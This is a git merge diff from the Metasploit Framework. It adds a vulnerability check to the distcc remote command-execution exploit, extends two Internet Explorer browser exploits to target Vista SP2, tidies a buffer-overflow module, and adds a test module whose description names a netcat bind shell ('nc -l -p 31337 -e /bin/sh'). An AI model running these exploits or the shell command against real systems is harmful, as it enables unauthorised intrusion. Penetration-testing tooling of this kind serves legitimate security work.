Merge branch 'master' into feature/vuln-info

2012-06-18 20:21:36 -05:00 · 2012-06-18 20:21:36 -05:00 · 073205a875
parent e7688e1dba f7a85f3f9d
commit 073205a875
7 changed files with 116 additions and 27 deletions
--- a/modules/auxiliary/gather/enum_dns.rb
+++ b/modules/auxiliary/gather/enum_dns.rb
@ -54,6 +54,7 @@ class Metasploit3 < Msf::Auxiliary
 			[
 				OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]),
 				OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]),
+				OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
 			], self.class)
 	end

@ -468,6 +469,10 @@ class Metasploit3 < Msf::Auxiliary

 	def run
 		@res = Net::DNS::Resolver.new()
+		if datastore['TCP_DNS']
+			vprint_status("Using DNS/TCP")
+			@res.use_tcp = true
+		end
 		@res.retry = datastore['RETRY'].to_i
 		@res.retry_interval = datastore['RETRY_INTERVAL'].to_i
 		@threadnum = datastore['THREADS'].to_i
--- a/modules/auxiliary/scanner/telnet/telnet_version.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_version.rb
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
 			::Timeout.timeout(to) do
 				res = connect
 				# This makes db_services look a lot nicer.
-				banner_santized = Rex::Text.to_hex_ascii(banner.to_s.unpack('C*').pack('U*'))
+				banner_santized = Rex::Text.to_hex_ascii(banner.to_s)
 				print_status("#{ip}:#{rport} TELNET #{banner_santized}")
 				report_service(:host => rhost, :port => rport, :name => "telnet", :info => banner_santized)
 			end
--- a/modules/exploits/unix/misc/distcc_exec.rb
+++ b/modules/exploits/unix/misc/distcc_exec.rb
@ -63,6 +63,21 @@ class Metasploit3 < Msf::Exploit::Remote
 				], self.class)
 	end

+	def check
+		r = rand_text_alphanumeric(10)
+		connect
+		sock.put(dist_cmd("sh", "-c", "echo #{r}"))
+
+		dtag = rand_text_alphanumeric(10)
+		sock.put("DOTI0000000A#{dtag}\n")
+
+		err, out = read_output
+		if out.index(r)
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
 	def exploit
 		connect

@ -72,6 +87,21 @@ class Metasploit3 < Msf::Exploit::Remote
 		dtag = rand_text_alphanumeric(10)
 		sock.put("DOTI0000000A#{dtag}\n")

+		err, out = read_output
+
+		(err || "").split("\n") do |line|
+			print_status("stderr: #{line}")
+		end
+		(out || "").split("\n") do |line|
+			print_status("stdout: #{line}")
+		end
+
+		handler
+		disconnect
+	end
+
+	def read_output
+
 		res = sock.get_once(24, 5)

 		if !(res and res.length == 24)
@ -85,12 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = sock.get_once(8, 5)
 		len = [res].pack("H*").unpack("N")[0]

-		return if not len
+		return [nil, nil] if not len
 		if (len > 0)
-			res = sock.get_once(len, 5)
-			res.split("\n").each do |line|
-				print_status("stderr: #{line}")
-			end
+			err = sock.get_once(len, 5)
 		end

 		# Check STDOUT
@ -98,16 +125,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = sock.get_once(8, 5)
 		len = [res].pack("H*").unpack("N")[0]

-		return if not len
+		return [err, nil] if not len
 		if (len > 0)
-			res = sock.get_once(len, 5)
-			res.split("\n").each do |line|
-				print_status("stdout: #{line}")
-			end
+			out = sock.get_once(len, 5)
 		end
+		return [err, out]

-		handler
-		disconnect
 	end


--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					],
 					[
-						'IE 8 on Windows 7 SP1 with JRE ROP',
+						'IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP',
 						{
 							'Rop'    => :jre,
 							'RopOffset' => '0x5f4',
@ -93,10 +93,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		return target if target.name != 'Automatic'

 		if agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
-			#Windows XP SP3 + IE 8.0
+			# Windows XP SP3 + IE 8.0
 			return targets[1]
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
-			#Windows 7 SP1 + IE 8.0
+		elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8\.0/
+			# Windows 7 SP1 + IE 8.0
+			# Vista SP2 + IE 8.0
 			return targets[3]
 		else
 			return nil
--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					],
 					[
-						'IE 8 with Java 6 on Windows 7 SP1',
+						'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
 						{
 							'Rop' => :jre,
 							'RopChainOffset' => '0x5f4',
@ -125,8 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			return targets[2]  #IE 7 on Windows XP SP3
 		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
 			return targets[3]  #IE 8 on Windows XP SP3
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
-			return targets[5]  #IE 8 on Windows 7 SP1
+		elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
+			return targets[5]  #IE 8 on Windows 7 SP1/Vista SP2
 		else
 			return nil
 		end
--- a/modules/exploits/windows/http/ezserver_http.rb
+++ b/modules/exploits/windows/http/ezserver_http.rb
@ -19,28 +19,28 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability',
 			'Description'    => %q{
 				This module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious
-				user sends packets containing an overly long string,  it may be possible to execute a
-				payload remotely. Due to size constraints, this module uses	the Egghunter technique.
+				user sends packets containing an overly long string, it may be possible to execute a
+				payload remotely. Due to size constraints, this module uses the Egghunter technique.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'modpr0be<modpr0be@spentera.com>',	# Original discovery and Metasploit module
+					'modpr0be<modpr0be[at]spentera.com>' # Original discovery and Metasploit module
 				],
 			'References'     =>
 				[
 					[ 'EDB', '19266' ],
-					[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ],
+					[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]
 				],
 			'DefaultOptions' =>
 				{
-					'ExitFunction' => 'seh',
+					'ExitFunction' => 'seh'
 				},
 			'Platform'       => 'win',
 			'Payload'        =>
 				{
 					'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",
-					'DisableNops' => true,
+					'DisableNops' => true
 				},
 			'Targets'        =>
 				[
--- a/test/modules/exploits/test/shell.rb
+++ b/test/modules/exploits/test/shell.rb
@ -0,0 +1,60 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ManualRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'         => 'Command Test',
+			'Description'  => %q{
+				This module tests cmd payloads by targeting (for example) a server
+				like: nc -l -p 31337 -e /bin/sh
+			},
+			'Author'	=> 'egypt',
+			'Version' => '$Revision$',
+			'References' => [ ],
+			'DefaultOptions' => { },
+			'Payload' =>
+				{
+				},
+			'Platform' => 'unix',
+			'Arch'     => ARCH_CMD,
+			'Targets' =>
+				[
+					[ 'Automatic Targeting', { } ],
+				],
+			'DefaultTarget' => 0
+		))
+
+		register_options(
+			[
+				Opt::RPORT(31337),
+			], self.class)
+	end
+
+	def autofilter
+		false
+	end
+
+	def exploit
+		connect
+
+		sock.put(payload.encoded + "\n")
+
+		handler
+	end
+
+end